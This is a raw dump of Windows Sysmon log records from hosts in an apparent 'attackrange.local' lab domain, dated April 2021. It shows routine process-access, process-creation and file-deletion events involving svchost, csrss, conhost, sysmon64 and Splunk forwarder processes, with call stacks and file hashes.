12:23:45.171{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440383Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.720{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0252-6088-BB28-00000000BA01}384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440382Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.719{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440381Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.719{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440380Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.719{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440379Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.719{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440378Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440377Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440376Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440375Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440374Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440373Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0252-6088-BB28-00000000BA01}384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440372Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0252-6088-BB28-00000000BA01}384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440371Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.718{42DC5269-0252-6088-BB28-00000000BA01}384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000440370Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.615{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E214D93CFECAE9DCEB488ABEAE33079F,SHA256=51D3D89674F84F52376D6F95AA4540CCEFDD7EBEB9247709792DEF115EA20976,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291574Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:46.432{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADD7C407FB286CC2CE4ECBABE322B813,SHA256=57AFE82F3F2B05ADCA5AAC3BA6E083F46E92FCD9C5EEFB8D4174D57B305B6515,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440369Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.349{42DC5269-0252-6088-BA28-00000000BA01}60885504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440368Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.218{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0252-6088-BA28-00000000BA01}6088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440367Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440366Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440365Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440364Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440363Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440362Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440361Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440360Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440359Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440358Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-0252-6088-BA28-00000000BA01}6088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 